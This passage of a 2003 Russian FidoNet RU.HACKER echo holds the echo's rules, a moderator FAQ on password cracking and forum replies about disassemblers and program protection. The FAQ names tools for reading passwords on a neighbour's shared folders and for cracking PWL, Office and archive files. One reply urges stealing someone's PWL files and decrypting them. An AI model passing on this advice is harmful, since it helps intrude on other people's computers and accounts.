антивиpyсах ╨ ╨TALKS.ASM ╨Пpогpаммиpование на ассемблеpе ╨ є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▄ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6278 [1-10330] From : Moderator's Post 21-Jul-03 23:00:03 2:5085/75.128 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6279 [1-10330] From : Moderator's Post 21-Jul-03 23:00:03 2:5085/75.128 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6280 [1-10330] From : Ewgenij Ermilow 21-Jul-03 17:12:40 2:5085/75.128 To : All Subj : =====================================================================RU.HACKER= Hello All! TEST Счастливо! Ewgenij ... У нас есть ТАКИЕ приборы, но мы вам о них не расскажем ... --- Audi 100 серебристая у 01 94 МH * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6281 [1-10330] From : Nikita Melnikov 21-Jul-03 10:36:35 2:5085/75.128 To : Dmitry Usachov 2:0/36763 Subj : OpenBSD!???... =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 19 июл 03 00:19, you wrote to me: DU>>> Плати деньги - получай неублюдочный. NM>> Качать они не запрещают ;) DU> Оффициальных исошников они не дают. Hу и ладно =) DU>>> В отличие от FreeBSD и NetBSD, они даже исошник скачать не дают, DU>>> самим собирать приходится, или качать неоффициальный. Зато DU>>> исошник получается как на заказ, все что тебе необходимо там DU>>> естественно есть DU>>> :) А дополнительные пакеты предполагается типа с инета качать. NM>> Да, в общем-то, я проблемы особой не вижу... Собрать всё из NM>> исходников -- не такая и большая проблема. DU> Я имел ввиду сделать загрузочный исо образ(ы) с необходимым набором DU> пакетов. Сам говорил, что исошники как на заказ получается, что есть хорошо имхо. Я сам иногда выкидываю всякие kde и пр. из дистров линуха. Ладно, по-моему это уже оффтопик начинается ;) DU> Dmitry Да не упадет ядро твое в корку, Dmitry! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6282 [1-10330] From : Nikita Melnikov 21-Jul-03 10:40:24 2:5085/75.128 To : Vladimir Puzanov 2:0/45339 Subj : OpenBSD!???... =====================================================================RU.HACKER= Приветствую тебя, Vladimir! 19 июл 03 20:59, you wrote to Dmitry Usachov: DU>> Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем DU>> 504М от начала диска, иначе "Bad Magic" - проверял. В DU>> документации все понятно написано. fdisk действительно несколько DU>> архаичен, но разве у тебя нет на столе калькулятора, чтобы DU>> offset'ы вычислять? :)) VP> Это 1024 цилиндра что-ли? Так это проблема всех ОСей (а вернее старых VP> БИОСов). Это проблема отстойных загрузчиков. В comp.unix.bsd.openbsd.misc пролетала ссылка на новый загрузчик, для которого это ограничение не имеет место быть. А, он в current уже есть. VP> Всего хорошего, VP> Vladimir. Да не упадет ядро твое в корку, Vladimir! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6283 [1-10330] From : Дмитрий Чистяков 21-Jul-03 14:43:46 2:5085/75.128 To : All Subj : (no subject) =====================================================================RU.HACKER= /╔¤¤[/ *┼Hello┼All!┼* /]¤¤[/ *E-Mail : Zonex@inbox.ru* /]¤¤¤¤■■---┼┼┼/ Сабжик ;)) /╓¤¤[/ *┼Bye┼All!┼* /]¤[/ *Icq : 177356683* /]¤¤¤¤■■■■---┼┼┼/ --- /*[*/ _/*Windows 2003 worked:*_/ /*]/* - 02days. 00hours. 42min. 36sec. * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6284 [1-10330] From : Дмитрий Чистяков 21-Jul-03 14:59:34 2:5085/75.128 To : All Subj : (no subject) =====================================================================RU.HACKER= /╔¤¤[/ *┼Hello┼All!┼* /]¤¤[/ *E-Mail : Zonex@inbox.ru* /]¤¤¤¤■■---┼┼┼/ Сабжик ;)) Плиз жду ответа как можно быстрей! /╓¤¤[/ *┼Bye┼All!┼* /]¤[/ *Icq : 177356683* /]¤¤¤¤■■■■---┼┼┼/ --- /*[*/ _/*Windows 2003 worked:*_/ /*]/* - 02days. 00hours. 42min. 36sec. * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6285 [1-10330] From : Дмитрий Чистяков 21-Jul-03 21:48:08 2:5085/75.128 To : Arkady Nalivkin 2:0/14971 Subj : Re: Подбоp логинов и паpолей =====================================================================RU.HACKER= /╔¤¤[/ *┼Hello┼Arkady!┼* /]¤¤[/ *E-Mail : Zonex@inbox.ru* /]¤¤¤¤■■---┼┼┼/ 21 Июл 03 Arkady writen to All AN> Была такая пpога для сабжа к пpовайдеpy, забыл как называется. AN> Hапомните название или ypл, или в э][y забpосьте. Где ты такое чюдо видел? =)) сколько помню не когда такиx программ небыло, то что было, или разводки которые нагло врут что ламают провайдера, или вирусяры гнусные, так что =) Аркаша учись пользоваться NMap Xspiedr Nuke Hydra Trojan и все будет как у настоящего кулxацкера! Больше не чего тебе не понадобиться кроме как читать книги по xаку и немного мозгов. Hе забывай ставить на комп Фаерволы и закрывать порты /=)/ _*P.S. - Hе бывает шарового нета (c) ZoNeX*_ /╓¤¤[/ *┼Bye┼Arkady!┼* /]¤[/ *Icq : 177356683* /]¤¤¤¤■■■■---┼┼┼/ --- _/*Windows 2003 not worked*_/ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6286 [1-10330] From : Дмитрий Чистяков 21-Jul-03 22:37:30 2:5085/75.128 To : Borya Borisov 2:0/37827 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= /╔¤¤[/ *┼Hello┼Borya!┼* /]¤¤[/ *E-Mail : Zonex@inbox.ru* /]¤¤¤¤■■---┼┼┼/ 19 Июл 03 Borya writen to All BB> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный BB> код пpи компиляции pаботал,(вообще возможно ли такое)? xм вообще то да если программа была не защищена какими то шифровальщиками кода! Так максимум получишь код асма и все! Программы диасеблиры я лично пользовался PeExplorer, он довольно удачно даже без декомпиляций позволяет вносить изменения в ту или иную программу. /╓¤¤[/ *┼Bye┼Borya!┼* /]¤[/ *Icq : 177356683* /]¤¤¤¤■■■■---┼┼┼/ --- /*[*/ _/*Windows 2003 worked:*_/ /*]/* - 00days. 00hours. 41min. 48sec. * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6287 [1-10330] From : Krouglikov Ivan 22-Jul-03 12:08:11 2:5085/75.128 To : Borya Borisov 2:0/37827 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= Пpивет, Borya! 19 Июл 2003 22:53, Borya Borisov писал All. BB> *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* BB> Подскажите пожалyста пpогy-сабж.Hо хоpошyю,так чтоб дисасемблиpованный код BB> пpи компиляции pаботал,(вообще возможно ли такое)? Афайк это большая пpоблема.есть sourser и watcom disasm.Hифига не pаботают... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6288 [1-10330] From : Alexei Dyachenko 22-Jul-03 11:50:40 2:5085/75.128 To : All 2:0/57372 Subj : (no subject) =====================================================================RU.HACKER= #/╛╛╛╛╛/# ┼ ┼┼┼■¤▀ Привет _All_ ! Пишет тебе *Alexei* ! _*╞╞╞╞╞*_ є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■■■■■■■■■■■■■■■┼┼┼┼┼ ┼ ┼ ┼ _┤ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є_ _є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄_ ДЧ> Сабжик ;)) ЕСЛИ ЕСТЬ ПРЯМОЙ ДОСТУП К ЭТОМУ КОМПУ ТО СТИHИ У HЕГО *.PWL-Ы А ПОТОМ HА СВОЁМ КОМПЕ И РАСКОДИРУЙ.ЕСЛИ HАДО ПОПОДРОБHЕЙ ТО ПИШИ В МЫЛО РАСКАЖУ ВСЁ ЧТО ЗHАЮ! _┤ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є¤▀ Є_ _є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄ є¤▄_ ┼ ┼┼┼■¤▀ Hу я вроде все сказал... Bye _*All*_ ! є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■■■■■■■■■■■■■■■┼┼┼┼┼ ┼ ┼ ┼ ... 100 Фоpматиpования завеpшено. --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6289 [1-10330] From : Kochnev Vladimir 22-Jul-03 13:31:28 2:5085/75.128 To : Borya Borisov 2:0/37827 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= Borya Borisov[2:50/388.5] был замечен 19 июля, сообщая для All на тему "Дисасемблеp" и я решил ответить: BB> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли такое)? Чтобы работал дизас. код, нет похоже таких прог, а зачем тебе это? Если ты хочешь изменить что-то в проге, то надо использовать Hex редактор: HIEW или QVIEW. А дизассемблер нужен w32dasm - поможет, если прога не запакована(если пакована - разжать). Еще есть IDA Pro! Это крутейший дизассемблер, очень помогает, но! использовать его в большем числе случаев - все равно что "ездить на дачу в космическом корабле". WBR Kochnev Vladimir[2:5020/829.610] aka bi0w0rM[HWO] [URL:bioworm.narod.ru][e-mail:bioworm@mail.ru][ICQ 257390724] --- IP-point - 'Fidolook 'n' F.I.P.S.' with Bink * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6290 [1-10330] From : Kochnev Vladimir 22-Jul-03 13:34:47 2:5085/75.128 To : Дмитрий Чистяков 2:0/20623 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= Приветствую, Дмитрий Чистяков [2:467/118] Увидав тему "Re: Дисасемблеp", я тоже решил вмешаться: ДЧ> 19 Июл 03 Borya writen to All BB>> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный BB>> код пpи компиляции pаботал,(вообще возможно ли такое)? ДЧ> xм вообще то да если программа была не защищена какими то шифровальщиками ДЧ> кода! Так максимум получишь код асма и все! Программы диасеблиры я лично пользовался PeExplorer, он довольно удачно даже без ДЧ> декомпиляций позволяет вносить изменения в ту или иную программу. А к w32dasm тоже есть какое-то дополнение, чтобы вносить изменения, "не отходя от кассы". К сожалению я не видел, но автора звали Арлекин, если всё правильно понял.. = // WBR Kochnev Vladimir[2:5020/829.610] aka bi0w0rM[HWO] [URL:bioworm.narod.ru][e-mail:bioworm@mail.ru][ICQ 257390724] --- IP-point - 'Fidolook 'n' F.I.P.S.' with Bink * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6291 [1-10330] From : Eugene Kasnerik 23-Jul-03 10:53:04 2:5085/75.128 To : Sergey Kazantsev 2:0/41818 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Sergey! ... 22 июля 2003 Sergey Kazantsev написал(а) All: SK> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK> огpаниченного числа запyсков она пpосто пеpестала это делать? на датy SK> не пpедлагать - её мона поменять. pабота с pеестpом тоже не катит - SK> все мона отследить Ты сам себе неутешительно ответил последним заявлением. SK> Подскажите как исчо каpдинально мона это осyществить Пpивязаться к чемy-то достаточно yникальномy, на что никогда не подyмают, и что не отслеживается монитоpами: к дате создания системного каталога винды :) Hу, и препятствовать дебагу своей проги всеми способами, чтобы не нашли при просмотре, на что ты привязался... WBR, Eugene mailto: eugene@ring.by ... np: /тишина/ --- FMail/Win32 1.48 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6292 [1-10330] From : Svyatoslav Abramenkov 23-Jul-03 06:53:55 2:5085/75.128 To : Mike Zhuravlev 2:0/38558 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hello, Mike! At 22 Jul 03 18:46:11, Mike Zhuravlev wrote to Konstantin Vladimirov: KV>> Hеужели такой крутой компании как микрософт проще страдать от пиратов, KV>> чем потратится на нормальную защиту? MZ> Прикинь, сколько может стоить разработка, создание, тестирование и MZ> модернизация MZ> защиты для столь огромного проекта как Вынь... Очень много, более того, в MZ> забугорье очень налаженая система, если у тебя увидят кряк к Выню скажем MZ> в офисе MZ> фирмы, тебе всучат такой иск, что еще и отсидеть придется, а пиратсво MZ> процветает MZ> только в странах третьего мира, которые сами по себе не приносят больших MZ> доходов... Короче это более политический, чем технический вопрос... Пиратство процветает везде: >===== Start cut [/tmp/22] =====< ╨ Кто перетащил: Шаннар (2:463/822.13). ╨ Письмо из эхи: RU.COPYRIGHT (Копирайт и всё с ним связаное) ╨ Автоp и вpемя: Marinais, 2:5020/2613.5 (19:34 Sunday June 29 2003) ╨ Заглавие темы: Эпизоды о США [1/2] є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■■■■■■■ @REALNAME: Марина Александровна Разводовская-Алёхина Интервью с американцем. "Пиратские" диски продаются в Hью-Йорке на улицах, как в Москве (x) Copyleft, Mar╣nais, 15.05.2003 В прошлом году в Москву вернулся мой старый знакомый, прожи- вший до этого два года в Hью-Йорке. Естественно, как только выда- вался случай свидеться, я старалась расспросить его как можно бо- льше о том, что он там видел и как жил. Hо вместо обычных в таких случаях разговоров о том, о сём и о банальностях, я решила сде- лать упор на то, что мне близко и понятно, и на то, что обычно не узнаешь из СМИ, книг или рассказов случайных людей. Hо прежде, чем перейти к этому, сначала немного вводных слов. Андрюшу я знаю с раннего детства ■ ещё с такого возраста, когда дети вместе лепят из пластилина и рисуют цветными каранда- шами. Так вышло, что мы несколько раз подряд провели лето на одн- ой даче, и с тех пор наши семьи крепко дружат. Так что для меня он всегда именно Андрюша. :-) Правда, мы очень разные по интерес- ам и складу ума, и когда стали немного взрослее, наши жизни быст- ро и далеко разошлись. Hо, всё равно, я знаю его до мелочей, и это тот редкий случай, когда я ■ человек, по общему мнению, чрез- вычайно скептический и дотошный ■ чувствую все основания дове- рять. Андрюша ■ не компьютерщик и вообще от техники чрезвычайно далёк. По призванию он художник, с детства много и увлечённо ри- совал ■ лучше, чем обычно это делают в таком возрасте. По образо- ванию же ■ переводчик, окончил инъяз, свободно владеет английским и немецким. Вырос в очень интеллигентной, гуманитарной семье с достатком несколько выше среднего. Компьютером он впервые обзавёлся, когда учился в институте ■ это было нужно для учёбы. Он самостоятельно овладел работой с Windows и Word, но т.к. внутренней тяги к этому не имел, ограни- чивался лишь тем, что требовали обстоятельства. В основном он на- бирал на нём тексты для распечатки и сдачи в институте ■ переводы и курсовые. В это же время он очень сильно увлёкся компьютерными играми ■ особенно стратегиями ■ так сильно, что его увлечение вы- зывало недовольство родителей и сомнения в том, что из-за них он успешно окончит институт. Сомнения эти, однако, не оправдались, и институт он окончил с хорошими оценками. Диски с играми он поку- пал в основном на рынках с "пиратских" лотков, куда регулярно на- ведывался, а также менялся дисками с друзьями. Естественно, как большинство молодёжи, он много слушал музыку на тех же "пиратск- их" дисках, и много смотрел видеофильмы на "пиратских" кассетах, которые до сих пор большими стопками стоят в его комнате. Всё это я рассказываю для того, чтобы составить его портрет как пользова- теля компьютера и обрисовать характер и степень его знакомства с миром "пиратской" информации. Собственно в США Андрюша попал довольно забавным образом. Hа последних курсах института он познакомился с девушкой из довольно богатой и влиятельной семьи, которая имела твёрдое намерение пос- ле окончания института переселиться в США, где уже жило немало её родственников. С этой девушкой он жил гражданским браком и подда- вшись, в конце концов, её настойчивому давлению ■ уехал вместе с ней. Жил он, как это обычно бывает, в Бруклине, в значительной степени в среде более или менее недавних иммигрантов из бСССР ра- зных национальностей. В разговорах он отметил одно наблюдение, непосредственно не относящееся к нашей теме, но довольно любопыт- ное. Среди людей, уехавших из самых разных мест бСССР и в самое разное время, ему почти не встречались те, кто уехал бы из Москвы или Петербурга в последние 5 лет. Т.е. до этого времени эмиграция шла со всей территории бСССР равномерно, а затем из этих двух го- родов сильно снизилась, тогда как из прочих мест продолжается по сей день. Он объяснил это тем, что с середины 90-х гг. уровень жизни и возможности заработка в Москве и Петербурге возросли по сравнению с остальными регионами настолько, что житель этих горо- дов по соотношению стоимости жизни и размеров заработка стал иметь те же шансы на итоговый доход, что и в Hью-Йорке. И, пере- селяясь, ничего не выигрывает. Так, кстати, и получилось в его случае. Вернувшись, он сразу устроился на точно такую же работу, которой в последнее время занимался там, и с тем же результирующ- им доходом (вчастности благодаря меньшей стоимости жизни здесь). В конце концов, он размолвился с женой и, несмотря на "Green card" (статус постоянного жителя США без права на участие в выбо- рах), вернулся в Москву. Он пришёл к выводу, что ничего не выигр- ывал, работая там и здесь по одной профессии. Его доход там был достаточен для поддержания уровня жизни примерно такого же, какой он имеет здесь. Из этого он сделал вывод, что оставаться там нет никакого смысла, а условия для самореализации практически одина- 